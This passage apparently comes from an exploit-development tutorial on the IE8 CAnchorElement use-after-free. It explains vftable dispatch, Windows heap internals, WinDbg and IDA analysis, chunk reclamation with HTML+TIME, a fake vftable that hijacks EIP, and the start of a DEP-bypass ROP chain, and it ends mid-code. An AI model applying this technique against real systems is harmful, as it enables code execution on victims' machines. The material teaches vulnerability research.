Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

Recall from a few images ago that we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to index this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction!
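The table indexing can also be modeled by hand in ordinary C++. The sketch below is my own approximation and not what the compiler literally emits: FakeObject, Method, kClassTwoVftable, callSlot, and slotOffset are hypothetical names, and the "vftable" is just an array of function pointers that I build myself. It mimics the mov reg, [ptr] followed by call [reg + offset] pattern, where slot 0 holds sharedFunction and slot 1 holds sharedFunction1.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hand-rolled model of a vftable. Real compilers generate this for you;
// every name here (FakeObject, Method, ...) is hypothetical.
struct FakeObject;
using Method = std::string (*)(FakeObject*);

struct FakeObject {
    const Method* vptr;   // first member: pointer to the table of function pointers
};

std::string twoSharedFunction(FakeObject*)  { return "classTwo sharedFunction"; }
std::string twoSharedFunction1(FakeObject*) { return "classTwo sharedFunction1"; }

// The pretend vftable for classTwo: slot 0 and slot 1.
const Method kClassTwoVftable[] = { twoSharedFunction, twoSharedFunction1 };

// Mirrors: mov rax, [object] ; call [rax + slot * sizeof(pointer)]
std::string callSlot(FakeObject* object, std::size_t slot) {
    assert(object != nullptr);
    const Method* table = object->vptr;   // load the vptr out of the object
    return table[slot](object);           // index the table and call, passing "this"
}

// Byte offset of a slot inside the table (0x8 for slot 1 when pointers are 8 bytes).
std::size_t slotOffset(std::size_t slot) {
    return slot * sizeof(Method);
}
```

With FakeObject object{kClassTwoVftable}, callSlot(&object, 0) lands in the first function and callSlot(&object, 1) lands in the second, which sits one pointer width further into the table. This is also why the table is such an interesting target: whoever controls the vptr controls where these calls go.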

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since c1 and c1_2 are both classOne pointers, and the classOne destructor is not virtual, deleting them only invokes the classOne destructor, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the debug C Runtime function _free_dbg in UCRTBASED, to free the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	c1->sharedFunction();
	c1_2->sharedFunction();

	delete c1;
	delete c1_2;

	// Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
	c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. gflags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process: gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourselves with the Windows heap, before moving on to the exploitation path.
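To make that question concrete, here is a minimal sketch of the idea in JavaScript. It is a toy model only: the ToyHeap type, its slots, and the "last freed, first reused" policy are assumptions made up for illustration, and nothing here is a real Windows or browser API. It just shows why a stale reference becomes dangerous once someone else's data lands in the freed slot.

```javascript
// Toy model only: a "heap" of numbered slots with a free list that hands back
// the most recently freed slot first. All names here are hypothetical.
function ToyHeap() {
  this.slots = [];     // slot index -> stored object (undefined when free)
  this.freeList = [];  // indexes of freed slots, most recent last
}

ToyHeap.prototype.alloc = function (contents) {
  // Reuse the most recently freed slot if there is one, else grow the heap.
  const index = this.freeList.length > 0 ? this.freeList.pop() : this.slots.length;
  this.slots[index] = contents;
  return index; // stands in for a pointer
};

ToyHeap.prototype.free = function (index) {
  this.slots[index] = undefined;
  this.freeList.push(index);
};

const heap = new ToyHeap();

// The legitimate object: its "vtable" is just an array of functions.
const victim = heap.alloc({ vtable: [function () { return "sharedFunction"; }] });
const dangling = victim; // a second reference that outlives the free

heap.free(victim);

// An attacker-controlled allocation of the "same size" lands in the freed slot.
const attacker = heap.alloc({ vtable: [function () { return "attacker code"; }] });

// The stale reference now dispatches through attacker-controlled data.
const result = heap.slots[dangling].vtable[0]();
console.log(attacker === dangling, result);
```

In the real exploit the "same slot" part is not free: it depends on requesting the same size as the freed chunk and on how the heap manager recycles chunks, which is why the heap is worth a quick look first.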

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr - The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, so techniques leveraging the heap internals described here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll!_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP) structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunk sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.
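As a rough illustration of that indexing, here is a simplified sketch using the two Windows 7 ArraySize values mentioned above. The assumptions are loud ones: sizes are counted in 8-byte blocks (which is how 0x80 maps to 1024 bytes and 0x800 to 16KB), chunk headers are ignored, and the index is computed as size-in-blocks minus BaseIndex. The function and field names are made up for this example and are not the real ntdll implementation.

```javascript
// Simplified model of picking a _HEAP_LIST_LOOKUP structure and a ListHints
// index. Assumptions: 8-byte blocks, chunk headers ignored, and
// index = sizeInBlocks - BaseIndex. Names are hypothetical.
const BLOCK_SIZE = 8;

// The two Windows 7 lookup structures described above.
const lookups = [
  { arraySize: 0x80, baseIndex: 0x0 },
  { arraySize: 0x800, baseIndex: 0x80 }
];

function listHintsSlot(requestBytes) {
  const blocks = Math.ceil(requestBytes / BLOCK_SIZE);
  for (let i = 0; i < lookups.length; i++) {
    if (blocks < lookups[i].arraySize) {
      return { lookup: i, index: blocks - lookups[i].baseIndex };
    }
  }
  return null; // too large for either structure in this toy model
}

// ArraySize expressed in bytes: 0x80 blocks and 0x800 blocks.
console.log(0x80 * BLOCK_SIZE, 0x800 * BLOCK_SIZE);
// A 0x68-byte request stays in the first structure.
console.log(listHintsSlot(0x68));
```

The takeaway is only that the requested size decides which hint is consulted, which is why knowing the exact size of the freed object matters later on.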

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.
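The activation heuristic can be sketched as a small counter. This is a toy model of the rule exactly as stated above (18 consecutive allocations of the same size turn the LFH on for that size, and it stays on); the real bookkeeping in the heap manager is more involved, and the LfhHeuristic name and its fields are hypothetical.

```javascript
// Toy model of the activation rule described above. Not the real ntdll logic.
const LFH_THRESHOLD = 18;

function LfhHeuristic() {
  this.lastSize = null;   // size of the previous request
  this.run = 0;           // length of the current run of same-size requests
  this.enabledSizes = {}; // sizes for which the LFH has been switched on
}

// Record one allocation request; returns true if the LFH services this size.
LfhHeuristic.prototype.onAlloc = function (size) {
  if (size === this.lastSize) {
    this.run += 1;
  } else {
    this.lastSize = size;
    this.run = 1;
  }
  if (this.run >= LFH_THRESHOLD) {
    this.enabledSizes[size] = true; // once enabled, it stays on
  }
  return this.enabledSizes[size] === true;
};

const heuristic = new LfhHeuristic();
let servicedByLfh = false;
for (let i = 0; i < 18; i++) {
  servicedByLfh = heuristic.onAlloc(0x68);
}
console.log(servicedByLfh);
```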

In any event, it is still worth talking about the LFH in its entirety, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap managers, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that the heap is explained far more thoroughly in Chris’ paper. The above explanations are not comprehensive, are targeted more towards Windows 7, and are kept brief because only these pieces are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code at first; focus instead on the actual root cause, which is that when a CPhraseElement’s outerText property is reset, an object is freed. However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. As we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contain a proof of concept similar to the one above. Note that although the elements described do not have the same names as the elements in the HTML, when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, exactly as we did earlier, to see if we can identify why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according to the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unassemble at the current instruction pointer, we can see something that is very reminiscent of the assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x10, entry 4 would be 0x18, and so on) and call it.
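The offset arithmetic is simple enough to sketch. The two helper functions below are hypothetical and only encode the rule that each table entry is one pointer wide: 8 bytes on our 64-bit test program, 4 bytes in a 32-bit process such as IE8.

```javascript
// Hypothetical helpers: map between a byte offset into a virtual function
// table and the 1-based entry number, given the pointer size.
function vtableOffset(entry, pointerSize) {
  return (entry - 1) * pointerSize;
}

function vtableEntry(offset, pointerSize) {
  if (offset % pointerSize !== 0) {
    throw new Error("offset is not pointer-aligned");
  }
  return offset / pointerSize + 1;
}

// 64-bit: entries 1 through 4 sit at 0x0, 0x8, 0x10 and 0x18.
for (let entry = 1; entry <= 4; entry++) {
  console.log(entry, "0x" + vtableOffset(entry, 8).toString(16));
}

// 32-bit: the entry fetched by [eax+70h].
console.log(vtableEntry(0x70, 4));
```

On 32-bit, an offset of 0x70 therefore works out to the 29th entry of the table, which is worth keeping in mind when sizing a fake table.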

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is a fetching of the vptr via [ecx]. ECX holds the address of the object, and dereferencing it yields the vptr, which is stored in EAX. The EAX register, which now contains the pointer to the virtual function table, is then offset by 0x70 bytes and dereferenced, which yields one of the virtual functions (whichever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Routines like this are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from [ecx]. Since ECX points to the object, which was allocated on the heap, it is technically a pointer to the heap chunk. Even though the memory is in a free state, ECX still points to it, and [ecx] is where the vptr is read from. It is only once we dereference the memory that we can see this chunk is actually invalid.

Moving on, taking a look at the call stack, we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vulnexe, and vulnexe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class is actually responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which are simply lists of the function calls that have led to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability’s name contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we would like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that we can fill this freed chunk with our own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, function arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is, again, a handle to an existing heap. The second is any flags you would like to set on the heap allocation. The third, and most important for us, is the actual size of the allocation. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger take over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!


This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now occupies the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx], takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr, which points to the virtual function table, is dereferenced at a specified offset, and the result is called. Notice how we currently control the memory ECX points to, which is where the vptr is read from.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that were previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, large enough to cover an offset of 0x70? What we could do is, with our primitive to control the vptr, replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 29 DWORD-sized pointers (think of these as 29 “fake functions”, covering offsets 0x0 through 0x70) and then have the vptr we control point to this table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the “function” at offset 0x70 in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!
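To see why this works, here is a minimal sketch that replays the fetch routine against a fake block of memory. The addresses 0x1000 and 0x2000 are arbitrary placeholders picked for illustration, and the DataView simply stands in for 32-bit little-endian process memory; only the three-instruction routine itself comes from the disassembly we looked at.

```javascript
// 64KB of pretend process memory, read and written as little-endian DWORDs.
const memory = new DataView(new ArrayBuffer(0x10000));
function write32(address, value) { memory.setUint32(address, value, true); }
function read32(address) { return memory.getUint32(address, true); }

const CHUNK = 0x1000;        // hypothetical address of the reclaimed chunk
const FAKE_VFTABLE = 0x2000; // hypothetical address of our fake table

// Our data replaces the freed object: its first DWORD is the fake vptr.
write32(CHUNK, FAKE_VFTABLE);
// The DWORD at offset 0x70 of the fake table is the "function" to be called.
write32(FAKE_VFTABLE + 0x70, 0x42424242);

function dispatch(ecx) {
  const eax = read32(ecx);        // mov eax, dword ptr [ecx]
  const edx = read32(eax + 0x70); // mov edx, dword ptr [eax+70h]
  return edx;                     // call edx
}

const target = dispatch(CHUNK);
console.log(target.toString(16));
```

Whatever DWORD we place at offset 0x70 of the table is what the program ends up calling, which is exactly the primitive we are after.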

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially, this HTML+TIME “method”, which only works for IE8, goes a step further. Just placing 0x68 bytes of raw data into the freed chunk still results in a crash, because we are not supplying pointers to anything. With HTML+TIME, we can instead fill the chunk with 0x68 bytes worth of pointers (26 DWORDs) that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.
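The size math behind this can be sketched quickly. The assumption here, taken from the Exodus write-up and the comments in the POC, is that each semicolon-separated string in the values property becomes one 4-byte pointer; the buildValues helper and the "AAAA" stand-in for the fake table are hypothetical.

```javascript
const POINTER_SIZE = 4;        // 32-bit process
const FREED_CHUNK_SIZE = 0x68; // size of the freed CAnchorElement chunk

// Build a semicolon-separated list: the fake table first, then filler strings.
// Assumes fakeTable itself contains no semicolon.
function buildValues(fakeTable, fillerCount) {
  let values = fakeTable;
  for (let i = 0; i < fillerCount; i++) {
    values += ";vftable";
  }
  return values;
}

// One pointer for the fake table plus enough fillers to reach 0x68 bytes.
const fillerCount = FREED_CHUNK_SIZE / POINTER_SIZE - 1;
const values = buildValues("AAAA", fillerCount);

const elementCount = values.split(";").length;
const pointerBytes = elementCount * POINTER_SIZE;
console.log(fillerCount, elementCount, "0x" + pointerBytes.toString(16));
```

That is where the 25 in the POC's second loop comes from: 1 pointer to the fake table plus 25 fillers is 26 pointers, or 0x68 bytes.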

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the member at offset 0x70 to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx] 	 ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]	 ; This takes the vptr in EAX, goes 0x70 bytes into the virtual function table it points to, and stores the function pointer found there in EDX
call edx 			 ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable (the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

The value pointed to by ECX, which is a pointer to our fake vtable, is placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and construct our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy with regard to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists.
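Since the fake table lives in a JavaScript string, a gadget address has to be written as two 16-bit characters, low half first, so that it reads back as a little-endian DWORD. Here is a small sketch of that packing, assuming the xchg eax, esp ; ret address 0x74c7a1ea used in the POC and the 0x41414141 filler; the packDword, buildFakeTable and readDword helpers are hypothetical names for illustration.

```javascript
// Pack a 32-bit value into two UTF-16 code units, low 16 bits first.
function packDword(value) {
  return String.fromCharCode(value & 0xffff, value >>> 16);
}

// Build a table of DWORDs covering offsets 0x0 through targetOffset, with
// targetDword at targetOffset and fillerDword everywhere else.
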